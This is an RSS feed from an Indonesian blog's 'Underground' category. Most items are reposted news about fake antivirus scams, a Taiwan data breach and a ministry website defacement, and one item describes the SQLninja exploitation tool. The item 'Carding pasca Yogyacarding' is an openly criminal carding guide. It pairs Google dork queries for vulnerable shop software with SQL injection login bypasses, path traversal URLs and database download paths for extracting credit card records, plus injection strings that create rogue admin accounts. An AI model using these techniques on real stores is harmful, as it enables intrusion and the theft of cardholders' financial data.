<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Budi Kurniawan Web Design &#187; Underground</title>
	<atom:link href="http://budi.akmi-baturaja.ac.id/category/underground/feed" rel="self" type="application/rss+xml" />
	<link>http://budi.akmi-baturaja.ac.id</link>
	<description>a place to share</description>
	<lastBuildDate>Fri, 20 Apr 2012 03:45:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Anti Virus Gadungan</title>
		<link>http://budi.akmi-baturaja.ac.id/anti-virus-gadungan.html</link>
		<comments>http://budi.akmi-baturaja.ac.id/anti-virus-gadungan.html#comments</comments>
		<pubDate>Tue, 21 Oct 2008 03:06:07 +0000</pubDate>
		<dc:creator>b0nk3y</dc:creator>
				<category><![CDATA[Underground]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://budi.akmi-baturaja.ac.id/?p=264</guid>
		<description><![CDATA[Program antivirus gadungan bergentayangan. Sebuah perusahaan sekuriti melansir program antivirus jadi-jadian ini telah menelan korban lebih dari 30 juta user, demikian seperti dilansir Arstechnica. Pengumuman ini dilansir oleh perusahaan sekuriti PandaLabs. Hari demi hari jumlah korban program antivirus gadungan terus bertambah. Program antivirus gadungan ini mengincar data personal dan uang user. Pada umumnya user yang [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Program antivirus gadungan bergentayangan. Sebuah perusahaan sekuriti melansir program antivirus jadi-jadian ini telah menelan korban lebih dari 30 juta user, demikian seperti dilansir Arstechnica. Pengumuman ini dilansir oleh perusahaan sekuriti PandaLabs. Hari demi hari jumlah korban program antivirus gadungan terus bertambah. Program antivirus gadungan ini mengincar data personal dan uang user. Pada umumnya user yang menjadi korban anti virus palsu tersebut diminta untuk men-dowload konten dari jaringan P2P, membuka lampiran e-mail dari alamat tak dikenal, atau mengunjungi halaman web yang berisi program berbahaya.</p>
<p align="justify"><span id="more-264"></span>User seringkali tertipu dengan pop up windows yang menyatakan bahwa PC tersebut terinfeksi, bluscreen palsu, dan berbagai tipuan lainnya. Sehingga mereka tergoda untuk membeli produk antivirus yang sebenarnya merupakan program berbahaya, dan memberikan data pribadi mereka.<br />
Diperkirakan oleh PandaLabs, pencipta program ini setiap bulannya meraup lebih dari €10 juta setiap bulan.</p>
<p>Sumber : detikinet.com</p>
<div id="seo_alrp_related"><h2>Posts Related to Anti Virus Gadungan</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/trojan-horse-msnbc.html" rel="bookmark">Trojan Horse MSNBC</a></h3><p>Berhati-hatilah jika ingin membuka e-mail yang berasal dari MSNBC, karena bisa jadi itu berisi program jahat yang disamarkan dengan mendompleng nama MSNBC. Itulah peringatan yang ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/antivirus-tak-jamin-komputer-aman.html" rel="bookmark">Antivirus Tak Jamin Komputer Aman</a></h3><p>Sehebat-hebatnya program antivirus, namun keberadaanya tetap saja tak bisa menjamin komputer pengguna bakal seratus persen aman dari serangan virus, malware, dan software jahat sejenisnya. Hal ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/yahoo-sebarkan-virus.html" rel="bookmark">Yahoo Sebarkan Virus?</a></h3><p>Salah satu situs dalam keluarga besar Yahoo disebut-sebut menyebarkan program jahat sejenis virus komputer. Tepatnya, penyebaran program jahat terjadi pada halaman My.yahoo.com, yaitu halaman yang ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/blue-screen-dari-cnn.html" rel="bookmark">Blue Screen dari CNN</a></h3><p>Rupanya tak hanya nama channel berita MSNBC yang dicatut virus, CNN mengalami nasib serupa. Sebuah virus yang dikategorikan sebagai spyware mencoba memanipulasi isi berita CNN. ...</p></div></li></ul></div><img src="http://budi.akmi-baturaja.ac.id/?ak_action=api_record_view&id=264&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://budi.akmi-baturaja.ac.id/anti-virus-gadungan.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Carding pasca Yogyacarding</title>
		<link>http://budi.akmi-baturaja.ac.id/carding-pasca-yogyacarding.html</link>
		<comments>http://budi.akmi-baturaja.ac.id/carding-pasca-yogyacarding.html#comments</comments>
		<pubDate>Mon, 06 Oct 2008 14:23:20 +0000</pubDate>
		<dc:creator>b0nk3y</dc:creator>
				<category><![CDATA[Underground]]></category>
		<category><![CDATA[Artikel]]></category>

		<guid isPermaLink="false">http://budi.akmi-baturaja.ac.id/?p=234</guid>
		<description><![CDATA[Era pembobolan kartu kredit setelah musnahnya Yogya carding pd tahun 2001/2002 dimana pada waktu itu benar2 trend nya pembelian barang2 secara online via kartu kredit orang lain.Yogyacarding pd waktu itu masuk pada peringkat pertama dalam kegiatan carding di asia.Sejak di tutupnya channel #yogya carding,sebagian carder terpecah pecah dan ada yang membentuk kelompok2 baru.Dan &#8220;para carder&#8221;pun [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Era pembobolan kartu kredit setelah musnahnya Yogya carding pd tahun 2001/2002 dimana pada waktu itu benar2 trend nya pembelian barang2 secara online via kartu kredit orang lain.Yogyacarding pd waktu itu masuk pada peringkat pertama dalam kegiatan carding di asia.Sejak di tutupnya channel #yogya carding,sebagian carder terpecah pecah dan ada yang membentuk kelompok2 baru.Dan &#8220;para carder&#8221;pun serasa hilang di telan bumi.Tapi bukan tidak mungkin kalau sisa sisa anggota Yogyacarding masih banyak dan beraktivitas.Salah satunya pemimpin mereka si bLaCkApRiL di yogyacardingtvheaven.com dan tulisan di bawah adalah sedikit &#8220;trik Carding&#8221;<br />
<span id="more-234"></span><strong>Contoh bugs pada bentuk toko sistem shopadmin :</strong><br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
Ketik google.com :&#8211;&gt; allinurl:/shopadmin.asp<br />
Contoh target : www.xxxxxx.com/shopadmin.asp<br />
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :<br />
user : &#8216;or&#8217;1<br />
pass : &#8216;or&#8217;1</p>
<p><strong>Contoh bugs pada bentuk toko sistem : Index CGI</strong><br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google.com : Ketik &#8211;&gt; allinurl:/store/index.cgi/page=<br />
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm<br />
Hapus short_blue.htm dan ganti dengan &#8211;&gt; ../admin/files/order.log<br />
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/<br />
order.log</p>
<p><strong>Contoh bugs pada bentuk toko sistem : metacart</strong><br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google.com allinurl:/metacart/<br />
Contoh target : www.xxxxxx.com/metacart/about.asp<br />
Hapus moreinfo.asp dan ganti dengan &#8211;&gt; /database/metacart.mdb<br />
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb</p>
<p><strong>Contoh bugs pada bentuk toko sistem <img src='http://budi.akmi-baturaja.ac.id/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> CShop</strong><br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google.com : Ketik &#8211;&gt; allinurl:/DCShop/<br />
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx<br />
Hapus /DCShop/xxxx dan ganti dengan &#8211;&gt; /DCShop/orders/orders.txt<br />
atau /DCShop/Orders/orders.txt<br />
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt</p>
<p><strong>Contoh bugs pada bentuk toko sistem : PDshopro</strong><br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google.com : Ketik &#8211;&gt; allinurl:/shop/category.asp/catid=<br />
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx<br />
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan &#8211;&gt; /admin/<br />
dbsetup.asp<br />
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp<br />
Dari keterangan diatas , kita dapati file databasenya dgn nama<br />
sdatapdshoppro.mdb<br />
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi<br />
www.xxxxxx.com/data/pdshoppro.mdb<br />
Buka file tsb pakai Microsoft Acces (karena untuk membaca database<br />
access.mdb sebaiknya pake ms access aja)</p>
<p><strong>Contoh bugs pada bentuk toko sistem : commerceSQL</strong><br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google : Ketik &#8211;&gt; allinurl:/commercesql/<br />
Contoh : www.xxxxx.com/commercesql/xxxxx<br />
Hapus commercesql/xxxxx dan ganti dengan &#8211;&gt;<br />
cgi-bin/commercesql/index.cgi?page=<br />
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=<br />
Untuk melihat admin config &#8211;&gt;<br />
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl<br />
Untuk melihat admin manager &#8211;&gt;<br />
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi<br />
Untuk melihat file log/CCnya &#8211;&gt;<br />
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order&#8230;</p>
<p><strong>Contoh bugs pada bentuk toko sistem : EShop</strong><br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google: Ketik &#8211;&gt; allinurl:/eshop/<br />
Contoh : www.xxxxx.com/xxxxx/eshop<br />
Hapus /eshop dan ganti dengan &#8211;&gt; /cg-bin/eshop/database/order.mdb<br />
Hasilnya : www.xxxxxx.com/&#8230;/cg-bin/eshop/database/order.mdb<br />
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces<br />
(karena untuk membaca database access.mdb sebaiknya pake ms access<br />
aja)</p>
<p><strong>Contoh bugs pada bentuk toko sistem : Cart32 v3.5a</strong><br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google.com: Ketik &#8211;&gt; allinurl:/cart32.exe/<br />
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound<br />
Ganti NoItemFound dengan &#8211;&gt; error<br />
Bila kita mendapati page error dg keterangan instalasi dibawahnya,<br />
berarti kita sukses!<br />
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman<br />
kebawah, dan cari bagian Page Setup and Directory<br />
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32<br />
berarti di site tsb. terdapat file berisi data cc<br />
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program<br />
text editor lainnya.<br />
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/<br />
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah<br />
dimodifikasi tadi, dengan format</p>
<p>http://www.xxxxx.com/cart32/</p>
<p>Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32</p>
<p><strong>Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0</strong><br />
teknik/jalan ke dua<br />
google.com Ketik &#8211;&gt; allinurl:/vpasp/shopdisplayproducts.asp<br />
Buka url target dan tambahkan string berikut di akhir bagian<br />
shopdisplayproducts.asp<br />
Contoh :</p>
<p>http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty&#8217;%20union%&#8230;,</p>
<p>fldpassword%20from%20tbluser%20where%20fldusername=<br />
&#8216;admin&#8217;%20and%20fldpassword%20like%20&#8242;a%25&#8242;&#8211;<br />
Gantilah nilai dari string url terakhir dg:<br />
%20&#8242;a%25&#8242;&#8211;<br />
%20&#8242;b%25&#8242;&#8211;<br />
%20&#8242;c%25&#8242;&#8211;<br />
Kalau berhasil, kita akan mendapatkan informasi username dan password<br />
admin<br />
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp<br />
silahkan Cari sendiri data CCnya</p>
<p><strong>Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0</strong><br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google.com : Ketik &#8211;&gt; allinurl:/vpasp/shopsearch.asp</p>
<p>Buka url target dan utk membuat admin baru, postingkan data berikut<br />
satu per satu pada bagian search engine :<br />
Keyword=&amp;category=5); insert into tbluser (fldusername) values<br />
(&#8221;)&#8211;&amp;SubCategory=&amp;hide=&amp;action.x=46&amp;action.y=6<br />
Keyword=&amp;category=5); update tbluser set fldpassword=&#8221; where<br />
fldusername=&#8221;&#8211;&amp;SubCategory=All&amp;action.x=33&amp;action.y=6<br />
Keyword=&amp;category=3); update tbluser set fldaccess=&#8217;1&#8242; where<br />
fldusername=&#8221;&#8211;&amp;SubCategory=All&amp;action.x=33&amp;action.y=6<br />
Jangan lupa untuk mengganti dan nya terserah kamu.<br />
Untuk mengganti password admin, masukkan keyword berikut :<br />
Keyword=&amp;category=5); update tbluser set fldpassword=&#8221; where<br />
fldusername=&#8217;admin&#8217;&#8211;&amp;SubCategory=All&amp;action.x=33&amp;action.y=6</p>
<p>Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp</p>
<p><strong>Contoh bugs pada bentuk toko sistem : Lobby.asp</strong><br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google.com Ketik &#8211;&gt; allinurl: Lobby.asp<br />
Contoh : www.xxxxx.com/mall/lobby.asp<br />
Hapus tulisan mall/lobby.asp dan ganti dengan &#8211;&gt; fpdb/shop.mdb<br />
Hasilnya : www.xxxxx.com/fpdb/shop.mdb</p>
<p><strong>Contoh bugs pada bentuk toko sistem : Shopper.cgi</strong><br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google : Ketik &#8211;&gt; allinurl: /cgi-local/shopper.cgi<br />
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&amp;key=<br />
Tambah dengan &#8211;&gt; &#8230;&amp;template=order.log<br />
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&amp;key=&#8230;&amp;template&#8230;</p>
<p><strong>Contoh bugs pada bentuk toko sistem <img src='http://budi.akmi-baturaja.ac.id/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> roddetail.asp</strong><br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
Ketik &#8211;&gt; allinurl:proddetail.asp?prod=<br />
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle<br />
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan &#8211;&gt; fpdb/<br />
vsproducts.mdb<br />
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb</p>
<p><strong>Contoh bugs pada bentuk toko sistem <img src='http://budi.akmi-baturaja.ac.id/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> igishop</strong><br />
contoh toko akan muncul di search engine bila mengetikan beberapa<br />
keyword, seperti :<br />
google Ketik &#8211;&gt; inurl:&#8221;/cart.php?m=&#8221;<br />
Contoh : http://xxxxxxx.com/store/cart.php?m=view.<br />
Hapus tulisan cart.php?m=view dan ganti dengan &#8211;&gt;admin<br />
Hasilnya http://xxxxxx.com/store/admin<br />
Trus masukin username sama pass nya pake statment SQL injection</p>
<p>Usename : &#8216;or&#8221;=&#8221;<br />
Password : &#8216;or&#8221;=&#8221;</p>
<p>Sumber : http://www.indungg.com/</p>
<div id="seo_alrp_related"><h2>Posts Related to Carding pasca Yogyacarding</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/meningkatkan-posisi-website-pada-search-engine.html" rel="bookmark">Meningkatkan Pagerank Pada Search Engine</a></h3><p>Melakukan Pendaftaran (submission) Bagaimana melakukan pendaftaran ? Gampang, Anda tinggal mengisi form pendaftaran URL yang disediakan masing-masing search engine. Misalnya untuk Google, form pendaftarannya ada ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/magento-oscommerce.html" rel="bookmark">Magento Oscommerce</a></h3><p>Untuk yang baru mengenal atau bahkan belum pernah sama sekali mendengar tentang Magento, mungkin artikel ini cukup bermanfaat sebagai referensi tentang perbendaharaan CMS (Content Management ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/bagaimana-sebuah-website-dapat-meningkatkan-penjualan-anda.html" rel="bookmark">Bagaimana sebuah Website dapat meningkatkan penjualan anda?</a></h3><p>Karena sebuah website yang dirancang dengan baik dan mengandung informasi yang tepat dapat membantu anda untuk meningkatkan penjualan serta menjaring pelanggan-pelanggan baru dari Internet.Website bekerja ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/petunjuk-seo-search-engine-optimization.html" rel="bookmark">Petunjuk SEO (Search Engine Optimization)</a></h3><p>Berikut adalah panduan untuk membuat situs anda mudah dicari, di-index, dan membantu Google dalam menentukan ranking untuk situs anda. Ketika situs anda telah siap, perhatikan ...</p></div></li></ul></div><img src="http://budi.akmi-baturaja.ac.id/?ak_action=api_record_view&id=234&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://budi.akmi-baturaja.ac.id/carding-pasca-yogyacarding.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Data Pribadi Presiden Dibobol Cracker</title>
		<link>http://budi.akmi-baturaja.ac.id/data-pribadi-presiden-dibobol-cracker.html</link>
		<comments>http://budi.akmi-baturaja.ac.id/data-pribadi-presiden-dibobol-cracker.html#comments</comments>
		<pubDate>Thu, 28 Aug 2008 06:41:54 +0000</pubDate>
		<dc:creator>b0nk3y</dc:creator>
				<category><![CDATA[Underground]]></category>
		<category><![CDATA[hacker]]></category>

		<guid isPermaLink="false">http://budi.akmi-baturaja.ac.id/?p=198</guid>
		<description><![CDATA[Ulah ilegal penjahat cyber kelas kakap kembali terbongkar. Polisi di Taiwan menahan enam cracker yang diduga membobol data personal dari jaringan perusahaan pemerintah. Bahkan dari data yang berhasil diangkut, terdapat informasi pribadi presiden Taiwan. Pejabat dari Criminal Investigation Bureau Taiwan menyatakan, para tersangka selain mencuri data dari lembaga pemerintah, juga membobol perusahaan telekomunikasi sampai jaringan [...]]]></description>
			<content:encoded><![CDATA[<p align="justify"><img class="alignnone alignleft" style="float:left;" src="http://tbn0.google.com/images?q=tbn:Qxpe_WAQzz-zyM:http://www.coolest-gadgets.com/wp-content/uploads/hacker_ii1.jpg" alt="" width="250" />Ulah ilegal penjahat cyber kelas kakap kembali terbongkar. Polisi di Taiwan menahan enam cracker yang diduga membobol data personal dari jaringan perusahaan pemerintah. Bahkan dari data yang berhasil diangkut, terdapat informasi pribadi presiden Taiwan. Pejabat dari Criminal Investigation Bureau Taiwan menyatakan, para tersangka selain mencuri data dari lembaga pemerintah, juga membobol perusahaan telekomunikasi sampai jaringan televisi. Ia menyebutkan bahwa operasi kriminal ini adalah kasus kejahatan cyber terbesar yang terungkap di Taiwan.<span id="more-198"></span></p>
<p align="justify">Tersangka diduga mencuri 50 juta data personal masyarakat Taiwan. Data orang penting yang berhasil dibobol termasuk informasi mengenai presiden Taiwan, Ma Ying-jeou, dan mantan presiden Chen Shui-bian.</p>
<p align="justify">Mereka kemudian menjual sebagian informasi pribadi tersebut seharga USD 10 per entri. Komplotan cracker yang berasal dari Taiwan dan China ini juga disinyalir mencuri uang dari rekening bank korban. Untuk mempertanggungjawabkan perbuatannya, para tersangka menghadapi ancaman hukuman sampai 5 tahun penjara.</p>
<p align="justify">Sumber : http://www.detikinet.com</p>
<div id="seo_alrp_related"><h2>Posts Related to Data Pribadi Presiden Dibobol Cracker</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/anti-virus-gadungan.html" rel="bookmark">Anti Virus Gadungan</a></h3><p>Program antivirus gadungan bergentayangan. Sebuah perusahaan sekuriti melansir program antivirus jadi-jadian ini telah menelan korban lebih dari 30 juta user, demikian seperti dilansir Arstechnica. Pengumuman ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/berhasil-dan-gagalnya-sebuah-sistem.html" rel="bookmark">Berhasil dan gagalnya sebuah sistem</a></h3><p>Ada sebagian mahasiswa yang bertanya kepada saya tentang bagaimana caranya meng”connect”kan laptop atau PC mereka ke dalam sebuah jaringan wireless. Ah itu sih gampang… Trus ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/virus-di-nasa.html" rel="bookmark">Virus di NASA</a></h3><p>Badan Penerbangan Luar Angkasa Amerika kedatangan sebuah virus yang menyusup melalui jaringan komputer. Virus tersebut sempat hinggap juga di jaringan komputer di orbit. "Virus jenis ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/samurai-cyber-latih-jawara-it-indonesia.html" rel="bookmark">&#8216;Samurai Cyber&#8217; Latih Jawara IT Indonesia</a></h3><p>Para jawara keamanan cyber Indonesia mendapat tamu khusus beberapa waktu lalu, yakni kedatangan tamu ahli kemanan TI asal Jepang. Sang Samurai cyber pun melatih para ...</p></div></li></ul></div><img src="http://budi.akmi-baturaja.ac.id/?ak_action=api_record_view&id=198&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://budi.akmi-baturaja.ac.id/data-pribadi-presiden-dibobol-cracker.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Situs Departemen Perindustrian Republik Indonesia di Hack</title>
		<link>http://budi.akmi-baturaja.ac.id/situs-departemen-perindustrian-republik-indonesia-di-hack.html</link>
		<comments>http://budi.akmi-baturaja.ac.id/situs-departemen-perindustrian-republik-indonesia-di-hack.html#comments</comments>
		<pubDate>Thu, 14 Aug 2008 02:28:35 +0000</pubDate>
		<dc:creator>b0nk3y</dc:creator>
				<category><![CDATA[Underground]]></category>
		<category><![CDATA[hacker]]></category>

		<guid isPermaLink="false">http://budi.akmi-baturaja.ac.id/?p=183</guid>
		<description><![CDATA[Masih saja ada situs pemerintahan indonesia yang dijahili oleh para hacker, ini terbukti dengan di redirect-nya halaman forum komunikasi Otonom Daerah pada Situs Departemen Perindustrian Republik Indonesia (Depperin). Situs Departemen Perindustrian Republik Indonesia (Depperin) jadi sasaran dedemit maya alias cracker. Salah satu halaman situs tersebut, tepatnya pada forum komunikasi Otonomi Daerah, telah di-hack. Pada hari [...]]]></description>
			<content:encoded><![CDATA[<p align="justify"><img class="alignnone alignleft" style="float:left;" src="http://jkt4.detikinet.com/images/content/2008/08/06/323/depperindihack-dlm.jpg" alt="" width="247" height="184" />Masih saja ada situs pemerintahan indonesia yang dijahili oleh para hacker, ini terbukti dengan di redirect-nya halaman forum komunikasi Otonom Daerah pada Situs Departemen Perindustrian Republik Indonesia (Depperin). Situs Departemen Perindustrian Republik Indonesia (Depperin) jadi sasaran dedemit maya alias cracker. Salah satu halaman situs tersebut, tepatnya pada forum komunikasi Otonomi Daerah, telah di-hack. Pada hari Rabu (6/8/2008), ketika di-klik, halaman forum komunikasi Otonomi Daerah yang sejatinya berisi tempat diskusi dan tanya jawab itu justru langsung di-redirect ke sebuah situs yang beralamat http://iraniancyber.persiangig.com/BlueMan.<span id="more-183"></span></p>
<p align="justify">&#8220;YOUR Box hacked BY ibh&#8221;, demikian sebaris pesan yang tertera pada halaman tersebut. Ibh sendiri merupakan kepanjangan dari Iran Black Hats Team. Berdasarkan sisa-sisa jejak yang ditinggalkan pelaku, terakhir kali situs Depperin diusili pada 22 Mei 2008. Jika memang benar demikian, maka sudah cukup lama pengelola situs Depperin tak menyadari kerentanan pada situsnya.</p>
<p>Sumber : http://jkt4.detikinet.com</p>
<div id="seo_alrp_related"><h2>Posts Related to Situs Departemen Perindustrian Republik Indonesia di Hack</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/apa-itu-google-adsense.html" rel="bookmark">Apa itu Google Adsense?</a></h3><p>AdSense adalah program kerjasama periklanan melalui media internet yang diselenggarakan oleh Google. Melalui program periklanan AdSense, pemilik situs web atau blog yang telah mendaftar dan ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/yahoo-sebarkan-virus.html" rel="bookmark">Yahoo Sebarkan Virus?</a></h3><p>Salah satu situs dalam keluarga besar Yahoo disebut-sebut menyebarkan program jahat sejenis virus komputer. Tepatnya, penyebaran program jahat terjadi pada halaman My.yahoo.com, yaitu halaman yang ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/apa-itu-rss.html" rel="bookmark">Apa itu RSS?</a></h3><p>RSS (Really Simple Syndication) adalah istilah dalam teknologi Internet yang merujuk pada cara men-sindikasi-kan konten sebuah situs web (web syndication). Layanan ini memudahkan pengguna Internet ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/internet-explorer-8.html" rel="bookmark">Internet Explorer 8</a></h3><p>Microsoft, yang telah merilis sebuah fitur complete beta dari Internet Explorer 8.0 dalam website mereka kemarin (27 agustus 2008), diungkapkan bahwa dua dari tujuan utama ...</p></div></li></ul></div><img src="http://budi.akmi-baturaja.ac.id/?ak_action=api_record_view&id=183&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://budi.akmi-baturaja.ac.id/situs-departemen-perindustrian-republik-indonesia-di-hack.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>About SQLninja</title>
		<link>http://budi.akmi-baturaja.ac.id/about-sqlninja.html</link>
		<comments>http://budi.akmi-baturaja.ac.id/about-sqlninja.html#comments</comments>
		<pubDate>Wed, 23 Jul 2008 02:30:15 +0000</pubDate>
		<dc:creator>b0nk3y</dc:creator>
				<category><![CDATA[Underground]]></category>

		<guid isPermaLink="false">http://budi.akmi-baturaja.ac.id/?p=160</guid>
		<description><![CDATA[Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered. It is released under the GPLv2 and it has been featured on SecurityHack&#8217;s Top 15 Free SQL Injection Scanners, which is a good result for something that started as a small script written on-the-fly during a pen-test.<span id="more-83"></span></p>
<p>The full documentation can be found in the tarball and also here, but here&#8217;s a list of what the Ninja does :</p>
<ul>
<li> Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)</li>
<li>Bruteforce of &#8216;sa&#8217; password (in 2 flavors: dictionary-based and incremental)</li>
<li>Privilege escalation to sysadmin group if &#8216;sa&#8217; password has been found</li>
<li>Creation of a custom xp_cmdshell if the original one has been removed</li>
<li>Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)</li>
<li>TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell</li>
<li>Direct and reverse bindshell, both TCP and UDP</li>
<li>DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)</li>
<li>Evasion techniques to confuse a few IDS/IPS/WAF</li>
<li>Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection</li>
</ul>
<p>Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on :</p>
<ul>
<li>Linux</li>
<li>FreeBSD</li>
<li>Mac OS X</li>
</ul>
<div id="seo_alrp_related"><h2>Posts Related to About SQLninja</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/sql-injection-scanner.html" rel="bookmark">SQL Injection Scanner</a></h3><p>Berikut ini beberapa aplikasi (tepatnya 15 aplikasi) yang dapat anda gunakan untuk melakukan scanning terhadap SQL Injection pada server yang paling banyak digunakan saat ini. ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/sql-injection.html" rel="bookmark">SQL injection</a></h3><p>SQL injection is a security exploit in which the attacker adds SQL code to a Web form input box to gain access. Manual testing for ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://budi.akmi-baturaja.ac.id/tentang-xss.html" rel="bookmark">Tentang XSS</a></h3><p>Cross-Site Scripting adalah sebuah injeksi yang dapat di input ke html atau me-remote halaman sebuah webpage. Cross-Site scripting atau biasa disingkat "XSS" adalah salah satu ...</p></div></li><li><div 